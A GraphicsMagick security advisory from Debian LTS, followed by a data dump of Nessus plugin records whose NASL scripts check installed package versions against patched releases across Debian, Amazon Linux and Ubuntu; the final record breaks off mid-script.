Various security issues were discovered in GraphicsMagick, a collection
of image processing tools. When a malformed image file is processed,
heap-based buffer overflows or over-reads may lead to a denial of
service, disclosure of in-memory information, or other unspecified impact.
For Debian 8 "Jessie", these problems have been fixed in version
1.3.20-3+deb8u3.
We recommend that you upgrade your graphicsmagick packages.
Further information about Debian LTS security advisories, how to apply
these updates to your system and frequently asked questions can be
found at: <https://wiki.debian.org/LTS>
{"nessus": [{"lastseen": "2022-03-27T15:43:43", "description": "Various security issues were discovered in Graphicsmagick, a collection of image processing tools. Heap-based buffer overflows or overreads may lead to a denial of service or disclosure of in-memory information or other unspecified impact by processing a malformed image file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-06-28T00:00:00", "type": "nessus", "title": "Debian DLA-1401-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718", "CVE-2016-5241", "CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449", "CVE-2017-11636", "CVE-2017-11643", "CVE-2017-12937", "CVE-2017-13063", "CVE-2017-13064", "CVE-2017-13065", "CVE-2017-13134", "CVE-2017-14314", "CVE-2017-14733", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", 
"p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1401.NASL", "href": "https://www.tenable.com/plugins/nessus/110727", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1401-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110727);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2016-3716\", \"CVE-2016-3717\", \"CVE-2016-3718\", \"CVE-2016-5241\", \"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\", \"CVE-2017-11636\", \"CVE-2017-11643\", \"CVE-2017-12937\", \"CVE-2017-13063\", \"CVE-2017-13064\", \"CVE-2017-13065\", \"CVE-2017-13134\", \"CVE-2017-14314\", \"CVE-2017-14733\", \"CVE-2017-16353\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Debian DLA-1401-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Various security issues were discovered in Graphicsmagick, a\ncollection of image processing tools. 
Heap-based buffer overflows or\noverreads may lead to a denial of service or disclosure of in-memory\ninformation or other unspecified impact by processing a malformed\nimage file.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/06/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.20-3+deb8u3\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.20-3+deb8u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-08-19T12:34:18", "description": "The NSFocus Security Team discovered multiple security issues in Graphicsmagick, a collection of image processing tools. 
Several heap-based buffer over-reads may lead to a denial of service (application crash) or possibly have other unspecified impact when processing a crafted file.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-09T00:00:00", "type": "nessus", "title": "Debian DLA-1231-1 : graphicsmagick security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17912", "CVE-2017-17915"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:graphicsmagick", "p-cpe:/a:debian:debian_linux:graphicsmagick-dbg", "p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat", "p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat", "p-cpe:/a:debian:debian_linux:libgraphics-magick-perl", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick%2b%2b3", "p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev", "p-cpe:/a:debian:debian_linux:libgraphicsmagick3", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-1231.NASL", "href": "https://www.tenable.com/plugins/nessus/105659", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1231-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105659);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17912\", \"CVE-2017-17915\");\n\n script_name(english:\"Debian DLA-1231-1 : graphicsmagick security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The NSFocus Security Team discovered multiple security issues in\nGraphicsmagick, a collection of image processing tools. Several\nheap-based buffer over-reads may lead to a denial of service\n(application crash) or possibly have other unspecified impact when\nprocessing a crafted file.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n1.3.16-1.1+deb7u16.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00005.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/graphicsmagick\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-imagemagick-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:graphicsmagick-libmagick-dev-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphics-magick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick++3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgraphicsmagick3\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-dbg\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-imagemagick-compat\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"graphicsmagick-libmagick-dev-compat\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphics-magick-perl\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++1-dev\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick++3\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick1-dev\", reference:\"1.3.16-1.1+deb7u16\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgraphicsmagick3\", reference:\"1.3.16-1.1+deb7u16\")) 
flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T01:19:40", "description": "A possible heap overflow was discovered in the EscapeParenthesis() function (CVE-2016-7447).\n\nVarious issues were found in the processing of SVG files in GraphicsMagick (CVE-2016-7446).\n\nThe TIFF reader had a bug pertaining to use of TIFFGetField() when a 'count' value is returned. The bug caused a heap read overflow (due to using strlcpy() to copy a possibly unterminated string) which could allow an untrusted file to crash the software (CVE-2016-7449).\n\nThe Utah RLE reader did not validate that header information was reasonable given the file size and so it could cause huge memory allocations and/or consume huge amounts of CPU, causing a denial of service (CVE-2016-7448)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-13T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : GraphicsMagick (ALAS-2016-752)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-7446", "CVE-2016-7447", "CVE-2016-7448", "CVE-2016-7449"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:GraphicsMagick", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b", "p-cpe:/a:amazon:linux:graphicsmagick-c%2b%2b-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo", "p-cpe:/a:amazon:linux:GraphicsMagick-devel", "p-cpe:/a:amazon:linux:GraphicsMagick-doc", "p-cpe:/a:amazon:linux:GraphicsMagick-perl", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2016-752.NASL", "href": "https://www.tenable.com/plugins/nessus/94018", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory 
ALAS-2016-752.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94018);\n script_version(\"2.4\");\n script_cvs_date(\"Date: 2018/04/18 15:09:36\");\n\n script_cve_id(\"CVE-2016-7446\", \"CVE-2016-7447\", \"CVE-2016-7448\", \"CVE-2016-7449\");\n script_xref(name:\"ALAS\", value:\"2016-752\");\n\n script_name(english:\"Amazon Linux AMI : GraphicsMagick (ALAS-2016-752)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A possible heap overflow was discovered in the EscapeParenthesis()\nfunction (CVE-2016-7447).\n\nVarious issues were found in the processing of SVG files in\nGraphicsMagick (CVE-2016-7446).\n\nThe TIFF reader had a bug pertaining to use of TIFFGetField() when a\n'count' value is returned. The bug caused a heap read overflow (due to\nusing strlcpy() to copy a possibly unterminated string) which could\nallow an untrusted file to crash the software (CVE-2016-7449).\n\nThe Utah RLE reader did not validate that header information was\nreasonable given the file size and so it could cause huge memory\nallocations and/or consume huge amounts of CPU, causing a denial of\nservice (CVE-2016-7448)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2016-752.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update GraphicsMagick' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-c++-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:GraphicsMagick-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-1.3.25-1.9.amzn1\")) 
flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-c++-devel-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-debuginfo-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-devel-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-doc-1.3.25-1.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"GraphicsMagick-perl-1.3.25-1.9.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GraphicsMagick / GraphicsMagick-c++ / GraphicsMagick-c++-devel / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-10-18T11:57:35", "description": "It was discovered that GraphicsMagick incorrectly handled certain image files. An attacker could possibly use this issue to cause a denial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-01-23T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4248-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-16545", "CVE-2017-16547", "CVE-2017-16669", "CVE-2017-17498", "CVE-2017-17500", "CVE-2017-17501", "CVE-2017-17502", "CVE-2017-17503", "CVE-2017-17782", "CVE-2017-17783"], "modified": "2020-09-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:graphicsmagick", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick%2b%2b-q16-12", "p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-4248-1.NASL", "href": "https://www.tenable.com/plugins/nessus/133207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4248-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(133207);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/17\");\n\n script_cve_id(\"CVE-2017-16545\", \"CVE-2017-16547\", \"CVE-2017-16669\", \"CVE-2017-17498\", \"CVE-2017-17500\", \"CVE-2017-17501\", \"CVE-2017-17502\", \"CVE-2017-17503\", \"CVE-2017-17782\", \"CVE-2017-17783\");\n script_xref(name:\"USN\", value:\"4248-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : GraphicsMagick vulnerabilities (USN-4248-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that GraphicsMagick incorrectly handled certain\nimage files. An attacker could possibly use this issue to cause a\ndenial of service or other unspecified impact.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4248-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected graphicsmagick, libgraphicsmagick++-q16-12 and /\nor libgraphicsmagick-q16-3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:graphicsmagick\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick++-q16-12\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libgraphicsmagick-q16-3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", 